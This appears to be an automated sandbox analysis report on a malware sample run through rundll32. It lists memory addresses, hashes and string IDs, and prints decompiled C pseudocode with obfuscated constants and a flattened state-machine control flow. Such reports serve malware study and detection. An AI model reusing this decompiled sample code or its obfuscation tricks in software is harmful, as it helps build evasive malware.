                                                                                                                      0x0068c447
                                                                                                                      0x0068c455
                                                                                                                      0x0068c456
                                                                                                                      0x0068c45b
                                                                                                                      0x0068c466
                                                                                                                      0x0068c46b
                                                                                                                      0x0068c46f
                                                                                                                      0x0068c477
                                                                                                                      0x0068c48a
                                                                                                                      0x0068c491
                                                                                                                      0x0068c49c
                                                                                                                      0x0068c4a7
                                                                                                                      0x0068c4b2
                                                                                                                      0x0068c4bd
                                                                                                                      0x0068c4c8
                                                                                                                      0x0068c4d0
                                                                                                                      0x0068c4dd
                                                                                                                      0x0068c4e6
                                                                                                                      0x0068c4ea
                                                                                                                      0x0068c4f2
                                                                                                                      0x0068c4fd
                                                                                                                      0x0068c505
                                                                                                                      0x0068c510
                                                                                                                      0x0068c51b
                                                                                                                      0x0068c523
                                                                                                                      0x0068c52e
                                                                                                                      0x0068c542
                                                                                                                      0x0068c549
                                                                                                                      0x0068c554
                                                                                                                      0x0068c55f
                                                                                                                      0x0068c572
                                                                                                                      0x0068c579
                                                                                                                      0x0068c584
                                                                                                                      0x0068c594
                                                                                                                      0x0068c5a1
                                                                                                                      0x0068c5a5
                                                                                                                      0x0068c5ad
                                                                                                                      0x0068c5b5
                                                                                                                      0x0068c5b9
                                                                                                                      0x0068c5c1
                                                                                                                      0x0068c5c9
                                                                                                                      0x0068c5d1
                                                                                                                      0x0068c5dc
                                                                                                                      0x0068c5e7
                                                                                                                      0x0068c5f2
                                                                                                                      0x0068c5fd
                                                                                                                      0x0068c608
                                                                                                                      0x0068c610
                                                                                                                      0x0068c61b
                                                                                                                      0x0068c623
                                                                                                                      0x0068c628
                                                                                                                      0x0068c62d
                                                                                                                      0x0068c635
                                                                                                                      0x0068c63d
                                                                                                                      0x0068c63d
                                                                                                                      0x0068c63d
                                                                                                                      0x0068c642
                                                                                                                      0x0068c642
                                                                                                                      0x0068c647
                                                                                                                      0x0068c647
                                                                                                                      0x0068c647
                                                                                                                      0x0068c64c
                                                                                                                      0x0068c64c
                                                                                                                      0x0068c64c
                                                                                                                      0x0068c64c
                                                                                                                      0x0068c64e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068c654
                                                                                                                      0x0068c917
                                                                                                                      0x0068c91c
                                                                                                                      0x0068c924
                                                                                                                      0x0068c926
                                                                                                                      0x0068c92b
                                                                                                                      0x00000000
                                                                                                                      0x0068c65a
                                                                                                                      0x0068c660
                                                                                                                      0x0068c83b
                                                                                                                      0x0068c847
                                                                                                                      0x0068c852
                                                                                                                      0x0068c857
                                                                                                                      0x0068c865
                                                                                                                      0x0068c89e
                                                                                                                      0x0068c8a5
                                                                                                                      0x0068c8b4
                                                                                                                      0x0068c8c5
                                                                                                                      0x0068c8c8
                                                                                                                      0x0068c8d8
                                                                                                                      0x0068c8de
                                                                                                                      0x00000000
                                                                                                                      0x0068c666
                                                                                                                      0x0068c66c
                                                                                                                      0x0068ca66
                                                                                                                      0x0068ca7b
                                                                                                                      0x0068c672
                                                                                                                      0x0068c674
                                                                                                                      0x0068c779
                                                                                                                      0x0068c782
                                                                                                                      0x0068c790
                                                                                                                      0x0068c796
                                                                                                                      0x0068c799
                                                                                                                      0x0068c7a2
                                                                                                                      0x0068c7ac
                                                                                                                      0x0068c7e3
                                                                                                                      0x0068c7e8
                                                                                                                      0x0068c7eb
                                                                                                                      0x0068c7f2
                                                                                                                      0x0068c821
                                                                                                                      0x0068c7f4
                                                                                                                      0x0068c805
                                                                                                                      0x0068c812
                                                                                                                      0x0068c817
                                                                                                                      0x0068c81a
                                                                                                                      0x0068c81a
                                                                                                                      0x0068c830
                                                                                                                      0x00000000
                                                                                                                      0x0068c67a
                                                                                                                      0x0068c680
                                                                                                                      0x0068c76f
                                                                                                                      0x00000000
                                                                                                                      0x0068c686
                                                                                                                      0x0068c688
                                                                                                                      0x0068c752
                                                                                                                      0x0068c759
                                                                                                                      0x0068c765
                                                                                                                      0x0068c767
                                                                                                                      0x0068c63d
                                                                                                                      0x0068c63d
                                                                                                                      0x0068c63d
                                                                                                                      0x0068c642
                                                                                                                      0x0068c647
                                                                                                                      0x0068c647
                                                                                                                      0x00000000
                                                                                                                      0x0068c647
                                                                                                                      0x0068c68e
                                                                                                                      0x0068c68e
                                                                                                                      0x0068c694

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ;<=$@_`$CA$D#$Kbf:$PB5$Y/c$cg.B$e($gc49$ll~$sJ$tEt$uP$vj$O~t$iS$ja*
                                                                                                                      • API String ID: 0-258179307
                                                                                                                      • Opcode ID: fea7e653e773f1a230156e891d8d5379a299080a6241029b8904df36aabb68b2
                                                                                                                      • Instruction ID: 9f69955add5b7b4f40cec68279a7dc2c2e745d47e8db22501c7b96983c26d337
                                                                                                                      • Opcode Fuzzy Hash: fea7e653e773f1a230156e891d8d5379a299080a6241029b8904df36aabb68b2
                                                                                                                      • Instruction Fuzzy Hash: 2F7201B1509381DFD378DF25C58AA9BBBE2BBC4314F10891DE6DA86260D7B18949CF13
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E00694B87(void* __ecx) {
                                                                                                                      				char _v524;
                                                                                                                      				char _v1044;
                                                                                                                      				char _v1564;
                                                                                                                      				char _v2084;
                                                                                                                      				char _v2604;
                                                                                                                      				signed int _v2608;
                                                                                                                      				intOrPtr _v2612;
                                                                                                                      				intOrPtr _v2616;
                                                                                                                      				intOrPtr _v2620;
                                                                                                                      				intOrPtr _v2624;
                                                                                                                      				char _v2628;
                                                                                                                      				intOrPtr _v2632;
                                                                                                                      				char _v2636;
                                                                                                                      				signed int _v2640;
                                                                                                                      				signed int _v2644;
                                                                                                                      				signed int _v2648;
                                                                                                                      				signed int _v2652;
                                                                                                                      				signed int _v2656;
                                                                                                                      				signed int _v2660;
                                                                                                                      				signed int _v2664;
                                                                                                                      				signed int _v2668;
                                                                                                                      				signed int _v2672;
                                                                                                                      				signed int _v2676;
                                                                                                                      				signed int _v2680;
                                                                                                                      				signed int _v2684;
                                                                                                                      				signed int _v2688;
                                                                                                                      				signed int _v2692;
                                                                                                                      				signed int _v2696;
                                                                                                                      				signed int _v2700;
                                                                                                                      				signed int _v2704;
                                                                                                                      				signed int _v2708;
                                                                                                                      				signed int _v2712;
                                                                                                                      				signed int _v2716;
                                                                                                                      				signed int _v2720;
                                                                                                                      				signed int _v2724;
                                                                                                                      				signed int _v2728;
                                                                                                                      				signed int _v2732;
                                                                                                                      				signed int _v2736;
                                                                                                                      				signed int _v2740;
                                                                                                                      				signed int _v2744;
                                                                                                                      				signed int _v2748;
                                                                                                                      				signed int _v2752;
                                                                                                                      				signed int _v2756;
                                                                                                                      				signed int _v2760;
                                                                                                                      				signed int _v2764;
                                                                                                                      				signed int _v2768;
                                                                                                                      				signed int _v2772;
                                                                                                                      				signed int _v2776;
                                                                                                                      				signed int _v2780;
                                                                                                                      				signed int _v2784;
                                                                                                                      				signed int _v2788;
                                                                                                                      				signed int _v2792;
                                                                                                                      				signed int _v2796;
                                                                                                                      				signed int _v2800;
                                                                                                                      				signed int _v2804;
                                                                                                                      				signed int _v2808;
                                                                                                                      				signed int _v2812;
                                                                                                                      				signed int _v2816;
                                                                                                                      				signed int _v2820;
                                                                                                                      				signed int _v2824;
                                                                                                                      				signed int _v2828;
                                                                                                                      				signed int _v2832;
                                                                                                                      				signed int _v2836;
                                                                                                                      				signed int _v2840;
                                                                                                                      				signed int _v2844;
                                                                                                                      				signed int _v2848;
                                                                                                                      				signed int _v2852;
                                                                                                                      				signed int _v2856;
                                                                                                                      				signed int _v2860;
                                                                                                                      				signed int _v2864;
                                                                                                                      				signed int _v2868;
                                                                                                                      				signed int _v2872;
                                                                                                                      				signed int _v2876;
                                                                                                                      				signed int _v2880;
                                                                                                                      				signed int _v2884;
                                                                                                                      				signed int _v2888;
                                                                                                                      				signed int _v2892;
                                                                                                                      				signed int _v2896;
                                                                                                                      				signed int _v2900;
                                                                                                                      				signed int _v2904;
                                                                                                                      				signed int _v2908;
                                                                                                                      				signed int _v2912;
                                                                                                                      				signed int _v2916;
                                                                                                                      				signed int _v2920;
                                                                                                                      				signed int _v2924;
                                                                                                                      				signed int _v2928;
                                                                                                                      				void* _t703;
                                                                                                                      				void* _t707;
                                                                                                                      				signed int _t708;
                                                                                                                      				signed int _t717;
                                                                                                                      				void* _t730;
                                                                                                                      				void* _t736;
                                                                                                                      				signed int _t738;
                                                                                                                      				signed int _t739;
                                                                                                                      				signed int _t740;
                                                                                                                      				signed int _t741;
                                                                                                                      				signed int _t742;
                                                                                                                      				signed int _t743;
                                                                                                                      				signed int _t744;
                                                                                                                      				signed int _t745;
                                                                                                                      				void* _t758;
                                                                                                                      				signed int _t798;
                                                                                                                      				void* _t803;
                                                                                                                      				void* _t804;
                                                                                                                      				void* _t811;
                                                                                                                      
                                                                                                                      				_v2608 = _v2608 & 0x00000000;
                                                                                                                      				_v2616 = 0xa2c333;
                                                                                                                      				_v2612 = 0xd97943;
                                                                                                                      				_v2696 = 0x74b91;
                                                                                                                      				_v2696 = _v2696 + 0xffffab65;
                                                                                                                      				_v2696 = _v2696 ^ 0x0006f6df;
                                                                                                                      				_v2804 = 0x130b03;
                                                                                                                      				_v2804 = _v2804 << 9;
                                                                                                                      				_v2804 = _v2804 + 0x8374;
                                                                                                                      				_v2804 = _v2804 ^ 0x26068974;
                                                                                                                      				_v2876 = 0x240a80;
                                                                                                                      				_v2876 = _v2876 >> 6;
                                                                                                                      				_v2876 = _v2876 >> 5;
                                                                                                                      				_v2876 = _v2876 ^ 0x3e269fec;
                                                                                                                      				_v2876 = _v2876 ^ 0x3e253447;
                                                                                                                      				_v2924 = 0x49db5b;
                                                                                                                      				_v2924 = _v2924 + 0xd552;
                                                                                                                      				_t803 = __ecx;
                                                                                                                      				_t798 = 0xce4571;
                                                                                                                      				_t738 = 0x27;
                                                                                                                      				_v2924 = _v2924 / _t738;
                                                                                                                      				_v2924 = _v2924 + 0x3019;
                                                                                                                      				_v2840 = _v2840 + 0xa5fa;
                                                                                                                      				_v2840 = _v2840 ^ 0x206e4944;
                                                                                                                      				_v2848 = 0x15799;
                                                                                                                      				_v2848 = _v2848 + 0xffffbd76;
                                                                                                                      				_v2848 = _v2848 | 0x84cc3dff;
                                                                                                                      				_v2848 = _v2848 ^ 0x84c4ee28;
                                                                                                                      				_v2740 = 0x344f78;
                                                                                                                      				_v2740 = _v2740 | 0xed30b44e;
                                                                                                                      				_v2740 = _v2740 + 0x582d;
                                                                                                                      				_v2740 = _v2740 ^ 0xed3a4892;
                                                                                                                      				_v2764 = 0x3aec11;
                                                                                                                      				_t745 = 0x14;
                                                                                                                      				_v2764 = _v2764 * 0x24;
                                                                                                                      				_v2764 = _v2764 * 0xd;
                                                                                                                      				_v2764 = _v2764 ^ 0x6bb19aaa;
                                                                                                                      				_v2772 = 0xa2a4e3;
                                                                                                                      				_v2772 = _v2772 * 0x54;
                                                                                                                      				_v2772 = _v2772 + 0xd74c;
                                                                                                                      				_v2772 = _v2772 ^ 0x35517ae7;
                                                                                                                      				_v2780 = 0xc7cad3;
                                                                                                                      				_v2780 = _v2780 ^ 0xe16f0727;
                                                                                                                      				_v2780 = _v2780 + 0xa55f;
                                                                                                                      				_v2780 = _v2780 ^ 0xe1ad612a;
                                                                                                                      				_v2788 = 0x30bac2;
                                                                                                                      				_v2788 = _v2788 << 2;
                                                                                                                      				_v2788 = _v2788 * 0x19;
                                                                                                                      				_v2788 = _v2788 ^ 0x130f6af8;
                                                                                                                      				_v2708 = 0x5b81b7;
                                                                                                                      				_v2708 = _v2708 << 0xd;
                                                                                                                      				_v2708 = _v2708 ^ 0x7032fecb;
                                                                                                                      				_v2816 = 0xe0b39a;
                                                                                                                      				_v2816 = _v2816 + 0xf3c;
                                                                                                                      				_v2816 = _v2816 * 0x29;
                                                                                                                      				_v2816 = _v2816 ^ 0x23fa5b32;
                                                                                                                      				_v2832 = 0xb37143;
                                                                                                                      				_v2832 = _v2832 + 0xffff99de;
                                                                                                                      				_v2832 = _v2832 / _t745;
                                                                                                                      				_v2832 = _v2832 | 0xcb90c15e;
                                                                                                                      				_v2832 = _v2832 ^ 0xcb9cb56b;
                                                                                                                      				_v2824 = 0xf7e429;
                                                                                                                      				_v2824 = _v2824 << 0x10;
                                                                                                                      				_v2824 = _v2824 ^ 0x4b169193;
                                                                                                                      				_v2824 = _v2824 ^ 0xaf30b470;
                                                                                                                      				_t703 = E00697CDB(_t745);
                                                                                                                      				_t797 = _v2708;
                                                                                                                      				_t736 = _t703;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					do {
                                                                                                                      						while(1) {
                                                                                                                      							L2:
                                                                                                                      							_t811 = _t798 - 0xa06a9d5;
                                                                                                                      							if(_t811 <= 0) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							__eflags = _t798 - 0xae01df1;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								_push(_v2740);
                                                                                                                      								_push(0);
                                                                                                                      								_push(_t745);
                                                                                                                      								_push(1);
                                                                                                                      								_push(0);
                                                                                                                      								_push(_v2848);
                                                                                                                      								_t745 = _v2732;
                                                                                                                      								_push( &_v524);
                                                                                                                      								E0068AB87(_t745, _v2840, __eflags);
                                                                                                                      								_t804 = _t804 + 0x1c;
                                                                                                                      								_t798 = 0xfe27958;
                                                                                                                      								_t707 = 0x8a3cf08;
                                                                                                                      								goto L24;
                                                                                                                      							} else {
                                                                                                                      								__eflags = _t798 - 0xb104717;
                                                                                                                      								if(_t798 == 0xb104717) {
                                                                                                                      									_t745 = _v2748;
                                                                                                                      									_t708 = E00684816(_t745, _v2632, _v2856, _v2636, _v2756, _v2680);
                                                                                                                      									_t797 = _t708;
                                                                                                                      									_t804 = _t804 + 0x10;
                                                                                                                      									__eflags = _t708;
                                                                                                                      									_t707 = 0x8a3cf08;
                                                                                                                      									_t798 =  !=  ? 0x8a3cf08 : 0xa06a9d5;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									__eflags = _t798 - 0xe3ea8aa;
                                                                                                                      									if(_t798 == 0xe3ea8aa) {
                                                                                                                      										return E00691E67(_v2708, _v2816, _v2832, _v2824, _v2628);
                                                                                                                      									}
                                                                                                                      									__eflags = _t798 - 0xfe27958;
                                                                                                                      									if(_t798 != 0xfe27958) {
                                                                                                                      										goto L24;
                                                                                                                      									} else {
                                                                                                                      										E00698519(_v2764, _v2772, _t797);
                                                                                                                      										_pop(_t745);
                                                                                                                      										_t798 = 0xa06a9d5;
                                                                                                                      										while(1) {
                                                                                                                      											L1:
                                                                                                                      											goto L2;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L27:
                                                                                                                      							return _t717;
                                                                                                                      						}
                                                                                                                      						if(_t811 == 0) {
                                                                                                                      							E00698519(_v2780, _v2788, _v2636);
                                                                                                                      							_pop(_t745);
                                                                                                                      							_t798 = 0xe3ea8aa;
                                                                                                                      							while(1) {
                                                                                                                      								L1:
                                                                                                                      								goto L2;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						if(_t798 == 0xce4571) {
                                                                                                                      							_push(_v2700);
                                                                                                                      							_push(_v2696);
                                                                                                                      							_push(_v2688);
                                                                                                                      							_t745 = _v2796;
                                                                                                                      							_push( &_v1044);
                                                                                                                      							E006946BB(_t745, _v2864);
                                                                                                                      							_t804 = _t804 - 0xc + 0x1c;
                                                                                                                      							_t798 = 0x2f0d176;
                                                                                                                      							while(1) {
                                                                                                                      								L1:
                                                                                                                      								goto L2;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						if(_t798 == 0x277711d) {
                                                                                                                      							_v2624 = E006859E9();
                                                                                                                      							_v2620 = 2 + E0068CB52(_v2668, _t714, _v2828, _v2768, _v2880) * 2;
                                                                                                                      							_t745 =  &_v2628;
                                                                                                                      							_t717 = E00698727(_t745, _v2804, _v2668, _v2872, _v2808, _v2668, _v2644, _t736, _t736, _v2760, _t736, _v2660, _v2640);
                                                                                                                      							_t804 = _t804 + 0x38;
                                                                                                                      							__eflags = _t717;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								_t798 = 0x47e8611;
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t798 == 0x2f0d176) {
                                                                                                                      								E0069DA22(_v2684, _v2836, __eflags, _v2664,  &_v2084, _t745, _v2900);
                                                                                                                      								 *((short*)(E0068B6CF( &_v2084, _v2752, _v2656, _v2800))) = 0;
                                                                                                                      								E00688969(_v2892,  &_v1564, __eflags, _v2728, _v2792);
                                                                                                                      								_push(_v2860);
                                                                                                                      								_push(_v2784);
                                                                                                                      								E006847CE( &_v2084, _v2920, _v2884, _v2676, _v2928, E0069DCF7(_v2884, 0x681308, __eflags),  &_v1564, _v2844, _v2744);
                                                                                                                      								E0068A8B0(_v2904, _t722, _v2912);
                                                                                                                      								_t745 = _v2888;
                                                                                                                      								_t717 = E0068EA99(_t745, _t803, _v2776, _v2648,  &_v2604, _v2896);
                                                                                                                      								_t804 = _t804 + 0x5c;
                                                                                                                      								__eflags = _t717;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									_t798 = 0x277711d;
                                                                                                                      									while(1) {
                                                                                                                      										L1:
                                                                                                                      										goto L2;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t798 == 0x47e8611) {
                                                                                                                      									_t745 =  &_v2636;
                                                                                                                      									E0069DEDC(_t745, _v2716, _v2692, _v2712,  &_v2628, _v2812);
                                                                                                                      									_t804 = _t804 + 0x10;
                                                                                                                      									asm("sbb esi, esi");
                                                                                                                      									_t798 = (_t798 & 0xfcd19e6d) + 0xe3ea8aa;
                                                                                                                      									while(1) {
                                                                                                                      										L1:
                                                                                                                      										goto L2;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									_t816 = _t798 - _t707;
                                                                                                                      									if(_t798 != _t707) {
                                                                                                                      										goto L24;
                                                                                                                      									} else {
                                                                                                                      										_push(_v2916);
                                                                                                                      										_push(_v2736);
                                                                                                                      										_t730 = E0069DCF7(_v2852, 0x6813f8, _t816);
                                                                                                                      										_pop(_t758);
                                                                                                                      										E0069453F(_v2820, _t816, _v2672, _t730, _v2868,  &_v1044, _t758, _v2704, _v2908, _t797,  &_v2604);
                                                                                                                      										_t804 = _t804 + 0x24;
                                                                                                                      										E0068A8B0(_v2724, _t730, _v2652);
                                                                                                                      										_pop(_t745);
                                                                                                                      										_t798 = 0xae01df1;
                                                                                                                      										while(1) {
                                                                                                                      											L1:
                                                                                                                      											goto L2;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						goto L27;
                                                                                                                      						L24:
                                                                                                                      						__eflags = _t798 - 0xe39a6fa;
                                                                                                                      					} while (__eflags != 0);
                                                                                                                      					return _t707;
                                                                                                                      				}
                                                                                                                      			}
                                                                                                                      0x00694c73
                                                                                                                      0x00694c7e
                                                                                                                      0x00694c8b
                                                                                                                      0x00694c8c
                                                                                                                      0x00694c96
                                                                                                                      0x00694c9a
                                                                                                                      0x00694c9f
                                                                                                                      0x00694ca7
                                                                                                                      0x00694cb2
                                                                                                                      0x00694cba
                                                                                                                      0x00694cc5
                                                                                                                      0x00694cd0
                                                                                                                      0x00694cdb
                                                                                                                      0x00694ce6
                                                                                                                      0x00694cf1
                                                                                                                      0x00694cfc
                                                                                                                      0x00694d07
                                                                                                                      0x00694d0f
                                                                                                                      0x00694d17
                                                                                                                      0x00694d1f
                                                                                                                      0x00694d24
                                                                                                                      0x00694d2c
                                                                                                                      0x00694d37
                                                                                                                      0x00694d42
                                                                                                                      0x00694d4d
                                                                                                                      0x00694d5a
                                                                                                                      0x00694d5e
                                                                                                                      0x00694d6b
                                                                                                                      0x00694d6f
                                                                                                                      0x00694d77
                                                                                                                      0x00694d8a
                                                                                                                      0x00694d91
                                                                                                                      0x00694d99
                                                                                                                      0x00694da4
                                                                                                                      0x00694daf
                                                                                                                      0x00694dba
                                                                                                                      0x00694dc5
                                                                                                                      0x00694dd0
                                                                                                                      0x00694ddb
                                                                                                                      0x00694de3
                                                                                                                      0x00694df0
                                                                                                                      0x00694df8
                                                                                                                      0x00694e07
                                                                                                                      0x00694e0a
                                                                                                                      0x00694e0e
                                                                                                                      0x00694e16
                                                                                                                      0x00694e1e
                                                                                                                      0x00694e29
                                                                                                                      0x00694e34
                                                                                                                      0x00694e3f
                                                                                                                      0x00694e4a
                                                                                                                      0x00694e55
                                                                                                                      0x00694e60
                                                                                                                      0x00694e6b
                                                                                                                      0x00694e76
                                                                                                                      0x00694e7e
                                                                                                                      0x00694e83
                                                                                                                      0x00694e8b
                                                                                                                      0x00694e93
                                                                                                                      0x00694e9b
                                                                                                                      0x00694ea6
                                                                                                                      0x00694eb1
                                                                                                                      0x00694eb9
                                                                                                                      0x00694ec4
                                                                                                                      0x00694ecc
                                                                                                                      0x00694ed4
                                                                                                                      0x00694ee1
                                                                                                                      0x00694ee5
                                                                                                                      0x00694eed
                                                                                                                      0x00694ef5
                                                                                                                      0x00694efa
                                                                                                                      0x00694eff
                                                                                                                      0x00694f07
                                                                                                                      0x00694f0f
                                                                                                                      0x00694f1a
                                                                                                                      0x00694f25
                                                                                                                      0x00694f30
                                                                                                                      0x00694f38
                                                                                                                      0x00694f41
                                                                                                                      0x00694f45
                                                                                                                      0x00694f4a
                                                                                                                      0x00694f52
                                                                                                                      0x00694f5f
                                                                                                                      0x00694f63
                                                                                                                      0x00694f70
                                                                                                                      0x00694f74
                                                                                                                      0x00694f7c
                                                                                                                      0x00694f87
                                                                                                                      0x00694f8e
                                                                                                                      0x00694f99
                                                                                                                      0x00694fa4
                                                                                                                      0x00694fb4
                                                                                                                      0x00694fbc
                                                                                                                      0x00694fbf
                                                                                                                      0x00694fc3
                                                                                                                      0x00694fc8
                                                                                                                      0x00694fd0
                                                                                                                      0x00694fd8
                                                                                                                      0x00694fdd
                                                                                                                      0x00694fe2
                                                                                                                      0x00694fea
                                                                                                                      0x00694ff2
                                                                                                                      0x00694ffa
                                                                                                                      0x00695002
                                                                                                                      0x0069500a
                                                                                                                      0x00695012
                                                                                                                      0x0069501a
                                                                                                                      0x00695025
                                                                                                                      0x00695032
                                                                                                                      0x00695039
                                                                                                                      0x00695044
                                                                                                                      0x0069504f
                                                                                                                      0x0069505a
                                                                                                                      0x00695065
                                                                                                                      0x0069506d
                                                                                                                      0x00695072
                                                                                                                      0x0069507a
                                                                                                                      0x00695082
                                                                                                                      0x0069508a
                                                                                                                      0x00695095
                                                                                                                      0x006950a0
                                                                                                                      0x006950ab
                                                                                                                      0x006950b6
                                                                                                                      0x006950c1
                                                                                                                      0x006950c8
                                                                                                                      0x006950d3
                                                                                                                      0x006950e2
                                                                                                                      0x006950e5
                                                                                                                      0x006950e9
                                                                                                                      0x006950f1
                                                                                                                      0x006950f9
                                                                                                                      0x00695104
                                                                                                                      0x0069510c
                                                                                                                      0x00695117
                                                                                                                      0x00695122
                                                                                                                      0x0069512a
                                                                                                                      0x0069513a
                                                                                                                      0x0069513e
                                                                                                                      0x00695146
                                                                                                                      0x0069514e
                                                                                                                      0x00695156
                                                                                                                      0x0069515e
                                                                                                                      0x00695166
                                                                                                                      0x0069516b
                                                                                                                      0x00695173
                                                                                                                      0x00695186
                                                                                                                      0x00695187
                                                                                                                      0x0069518e
                                                                                                                      0x00695199
                                                                                                                      0x006951a4
                                                                                                                      0x006951af
                                                                                                                      0x006951ba
                                                                                                                      0x006951c5
                                                                                                                      0x006951d0
                                                                                                                      0x006951db
                                                                                                                      0x006951e6
                                                                                                                      0x006951f1
                                                                                                                      0x006951fc
                                                                                                                      0x00695205
                                                                                                                      0x0069520c
                                                                                                                      0x00695217
                                                                                                                      0x00695222
                                                                                                                      0x0069522d
                                                                                                                      0x00695238
                                                                                                                      0x00695243
                                                                                                                      0x0069524e
                                                                                                                      0x00695256
                                                                                                                      0x00695261
                                                                                                                      0x0069526c
                                                                                                                      0x00695277
                                                                                                                      0x00695282
                                                                                                                      0x00695295
                                                                                                                      0x0069529c
                                                                                                                      0x006952a4
                                                                                                                      0x006952af
                                                                                                                      0x006952ba
                                                                                                                      0x006952cd
                                                                                                                      0x006952d4
                                                                                                                      0x006952e1
                                                                                                                      0x006952f5
                                                                                                                      0x006952f8
                                                                                                                      0x006952ff
                                                                                                                      0x0069530a
                                                                                                                      0x00695315
                                                                                                                      0x0069531d
                                                                                                                      0x00695322
                                                                                                                      0x0069532a
                                                                                                                      0x00695332
                                                                                                                      0x0069533a
                                                                                                                      0x00695345
                                                                                                                      0x00695350
                                                                                                                      0x0069535b
                                                                                                                      0x00695366
                                                                                                                      0x00695379
                                                                                                                      0x00695380
                                                                                                                      0x0069538b
                                                                                                                      0x00695393
                                                                                                                      0x00695398
                                                                                                                      0x006953a5
                                                                                                                      0x006953a9
                                                                                                                      0x006953b1
                                                                                                                      0x006953bc
                                                                                                                      0x006953c7
                                                                                                                      0x006953d2
                                                                                                                      0x006953dd
                                                                                                                      0x006953e5
                                                                                                                      0x006953ea
                                                                                                                      0x006953f7
                                                                                                                      0x006953fb
                                                                                                                      0x00695403
                                                                                                                      0x0069540e
                                                                                                                      0x00695416
                                                                                                                      0x00695421
                                                                                                                      0x0069542c
                                                                                                                      0x0069543f
                                                                                                                      0x00695446
                                                                                                                      0x00695451

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID: -X$8ZD$8ZD$:%$>`U$@Y$DIn $G4%>$R@$[z}~$_p$e3c$noz$xO4$~wP`$!=$'$zQ5
                                                                                                                      • API String ID: 1514166925-4215140744
                                                                                                                      • Opcode ID: a2040f04defaf98b30c9f87c17561d0f4912f01a8fe5b98d204457386b609180
                                                                                                                      • Instruction ID: 0196672f47c3d37f76655ef73be526f54fd2990fa0c29bf44ca436bf3ca4d0f4
                                                                                                                      • Opcode Fuzzy Hash: a2040f04defaf98b30c9f87c17561d0f4912f01a8fe5b98d204457386b609180
                                                                                                                      • Instruction Fuzzy Hash: D87200714093819FD3B9CF65C58AB8BBBE1BBC4318F108A1DE1DA96260D7B48949CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 98%
                                                                                                                      			E00692550() {
                                                                                                                      				signed int _v28;
                                                                                                                      				char _v36;
                                                                                                                      				char _v84;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v140;
                                                                                                                      				intOrPtr _v144;
                                                                                                                      				char _v152;
                                                                                                                      				signed int _v172;
                                                                                                                      				char _v180;
                                                                                                                      				char _v188;
                                                                                                                      				char _v192;
                                                                                                                      				char _v196;
                                                                                                                      				char _v200;
                                                                                                                      				char _v204;
                                                                                                                      				signed int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				signed int _v216;
                                                                                                                      				signed int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				signed int _v228;
                                                                                                                      				signed int _v232;
                                                                                                                      				signed int _v236;
                                                                                                                      				signed int _v240;
                                                                                                                      				signed int _v244;
                                                                                                                      				signed int _v248;
                                                                                                                      				signed int _v252;
                                                                                                                      				signed int _v256;
                                                                                                                      				signed int _v260;
                                                                                                                      				signed int _v264;
                                                                                                                      				signed int _v268;
                                                                                                                      				signed int _v272;
                                                                                                                      				signed int _v276;
                                                                                                                      				signed int _v280;
                                                                                                                      				signed int _v284;
                                                                                                                      				signed int _v288;
                                                                                                                      				unsigned int _v292;
                                                                                                                      				signed int _v296;
                                                                                                                      				signed int _v300;
                                                                                                                      				signed int _v304;
                                                                                                                      				signed int _v308;
                                                                                                                      				signed int _v312;
                                                                                                                      				signed int _v316;
                                                                                                                      				signed int _v320;
                                                                                                                      				signed int _v324;
                                                                                                                      				signed int _v328;
                                                                                                                      				signed int _v332;
                                                                                                                      				signed int _v336;
                                                                                                                      				signed int _v340;
                                                                                                                      				signed int _v344;
                                                                                                                      				signed int _v348;
                                                                                                                      				signed int _v352;
                                                                                                                      				signed int _v356;
                                                                                                                      				signed int _v360;
                                                                                                                      				signed int _v364;
                                                                                                                      				signed int _v368;
                                                                                                                      				signed int _v372;
                                                                                                                      				signed int _v376;
                                                                                                                      				signed int _v380;
                                                                                                                      				signed int _v384;
                                                                                                                      				signed int _v388;
                                                                                                                      				signed int _v392;
